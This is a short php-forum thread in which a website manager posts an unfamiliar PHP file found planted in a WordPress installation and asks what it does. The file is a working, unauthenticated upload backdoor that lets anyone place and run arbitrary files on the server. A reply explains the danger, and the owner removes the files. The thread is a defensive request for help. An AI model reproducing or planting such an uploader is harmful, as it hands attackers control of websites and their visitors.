php code embedded in wordpress site

Ask about general coding issues or problems here.

Moderators: egami, macek, gesf

Post Reply
dm61
New php-forum User
New php-forum User
Posts: 2
Joined: Sun Nov 18, 2018 6:02 pm

Sun Nov 18, 2018 6:10 pm

I am not a php coder. I manage a website and found the following code in a file named wp-admine4.php in a folder named flexx that was created a few days ago.

Can anyone interpret this code and tell me what they are trying to do?

<!DOCTYPE html>
<html>
<head>
<meta charset=utf-8>
<title>loader</title>
</head>
<body>
<h1>loader</h1>


<form method="post" enctype="multipart/form-data">
<input type="file" name="filename"><br>
<input type="submit" value="upload"><br>
</form>

<?php
if (is_uploaded_file($_FILES["filename"]["tmp_name"]))
{
move_uploaded_file($_FILES["filename"]["tmp_name"], $_FILES["filename"]["name"]);
$file = $_FILES["filename"]["name"];
echo '<a href='.$file.'>'.$file.'</a>';
} else {
echo("FILE");
}

?>
</body>
</html>

User avatar
hyper
php-forum Fan User
php-forum Fan User
Posts: 761
Joined: Mon Feb 22, 2016 5:52 pm

Mon Nov 19, 2018 1:27 pm

I don't know anything about WordPress, but that looks like a dangerous piece of code to me, it gives a user the ability to upload a file and execute it doing whatever they want - unless the folder is in-accessible, no signing in, just put the address in your web browser and hijack.

I would change the filename to something else and see what breaks while you conduct some more research on it. I certainly wouldn't allow it on any site of mine without major modification, regardless of how well regarded (or not) WordPress is, that is dangerous file to have on your site.

dm61
New php-forum User
New php-forum User
Posts: 2
Joined: Sun Nov 18, 2018 6:02 pm

Tue Nov 20, 2018 8:06 pm

Thank you. I have deinstalled wordpress and deleted the files.

Post Reply